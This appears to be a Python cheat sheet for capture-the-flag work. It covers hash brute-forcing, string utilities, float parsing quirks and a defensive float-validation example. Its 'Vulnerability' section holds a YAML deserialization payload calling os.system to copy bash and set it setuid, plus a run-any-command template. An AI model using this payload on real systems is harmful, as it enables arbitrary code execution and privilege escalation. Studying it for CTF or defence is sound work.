PYTHON

Vulnerability

  • Load yaml

    • !!python/object/new:os.system [cp /bin/bash /tmp/bash;chmod u+s /tmp/bash]
      !!python/object/new:os.system [<RUN COMMAND IN HERE>]

Technique

  • Find an input whose SHA256 hex digest ends with a known suffix

    • Using hashlib

    import hashlib
    import random
    
    h=None
    while(h is None or h[-5:]!='512bf'):
        p=random.randrange(1, 0xffffffffffffffffffffffff)
        h=hashlib.sha256(p.to_bytes(12, 'big')).hexdigest()
    
    print('SHA256(' + hex(p) + ')=' + h)

    • Using pwntools

    from pwn import *
    import hashlib, string
    suffix = '512bf'  # known trailing hex digits of the digest
    pwnlib.util.iters.mbruteforce(lambda x: hashlib.sha256(x.encode()).hexdigest()[-5:] == suffix, string.ascii_lowercase, length = 10)

  • Read file

# Read and decode hex (Python 3: str has no .decode('hex'))
output = bytes.fromhex(open("output.txt","r").read().strip())

  • Get printable strings

import string

# Uppercase ['A','B',...]
UPPER = list(string.ascii_uppercase)

# Lowercase ['a','b',...]
LOWER = list(string.ascii_lowercase)

# All printable ASCII
ALL = list(string.printable)

  • Shuffle strings

import random

# random.shuffle works in place and needs a mutable sequence, not a str
TEMP = list("abcdefg")
random.shuffle(TEMP)
TEMP = "".join(TEMP)

  • Counter Library

from collections import Counter, OrderedDict

freq = Counter("abbbccccdd")

# Sorted By Descending Order
sorted(freq.items(), key=lambda i: i[1], reverse=True)
# => Output = [('c', 4), ('b', 3), ('d', 2), ('a', 1)]

Conversion

# Binary to hex
dec_str2 = format(int('0100010000', 2), 'x')
dec_str2 = dec_str2.rjust(4, '0')  # rjust returns a new string
print(dec_str2)

String to Float/Int

val                   is_float     Note
--------------------  ----------   --------------------------------
""                    False        Blank string
"127"                 True         Passed string
True                  True         Pure sweet Truth
"True"                False        Vile contemptible lie
False                 True         So false it becomes true
"123.456"             True         Decimal
"      -127    "      True         Spaces trimmed
"\t\n12\r\n"          True         whitespace ignored
"NaN"                 True         Not a number
"NaNanananaBATMAN"    False        I am Batman
"-iNF"                True         Negative infinity
"123.E4"              True         Exponential notation
".1"                  True         mantissa only
"1,234"               False        Commas gtfo
u'\x30'               True         Unicode is fine.
"NULL"                False        Null is not special
0x3fade               True         Hexadecimal
"6e7777777777777"     True         Shrunk to infinity
"1.797693e+308"       True         This is max value
"infinity"            True         Same as inf
"infinityandBEYOND"   False        Extra characters wreck it
"12.34.56"            False        Only one dot allowed
u'四'                 False        Japanese '4' is not a float.
"#56"                 False        Pound sign
"56%"                 False        Percent of what?
"0E0"                 True         Exponential, move dot 0 places
0**0                  True         0___0  Exponentiation
"-5e-5"               True         Raise to a negative number
"+1e1"                True         Plus is OK with exponent
"+1e1^5"              False        Fancy exponent not interpreted
"+1e1.3"              False        No decimals in exponent
"-+1"                 False        Make up your mind
"(1)"                 False        Parenthesis is bad

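The table has a validation consequence: values such as "NaN", "-iNF", "6e7777777777777" and the bool True all pass a float()-based check, and NaN then slips past an ordinary range test. The block below is an added example, not code from the original page. The is_float body is an assumed implementation consistent with the table, and naive_in_range, parse_finite_float and strict_accepts are hypothetical names.

```python
import math

def is_float(val):
    """Permissive check matching the table: True for anything float() accepts."""
    try:
        float(val)
        return True
    except (TypeError, ValueError):
        return False

def naive_in_range(val, lo, hi):
    """Typical validation built on float(): parse, then reject out-of-range values."""
    x = float(val)
    if x < lo or x > hi:      # every comparison with NaN is False, so NaN passes
        return False
    return True

def parse_finite_float(val, lo, hi):
    """Strict parse for untrusted input: str only, finite, and inside [lo, hi]."""
    if not isinstance(val, str):          # rejects True/False and non-string numbers
        raise ValueError("expected str, got %s" % type(val).__name__)
    try:
        x = float(val)
    except ValueError:
        raise ValueError("not a number: %r" % val) from None
    if not math.isfinite(x):              # rejects NaN, +/-inf and overflow to inf
        raise ValueError("non-finite value: %r" % val)
    if not (lo <= x <= hi):               # positive form of the test fails closed
        raise ValueError("out of range: %r" % val)
    return x

def strict_accepts(val, lo, hi):
    """Boolean wrapper around parse_finite_float for quick comparisons."""
    try:
        parse_finite_float(val, lo, hi)
        return True
    except ValueError:
        return False

# Constructed sample inputs, taken from rows of the table above.
SAMPLES = ["127", "      -127    ", "NaN", "-iNF", "6e7777777777777", True, "1,234"]

if __name__ == "__main__":
    for s in SAMPLES:
        print("%-20r is_float=%-5s strict=%s"
              % (s, is_float(s), strict_accepts(s, -1000, 1000)))
```
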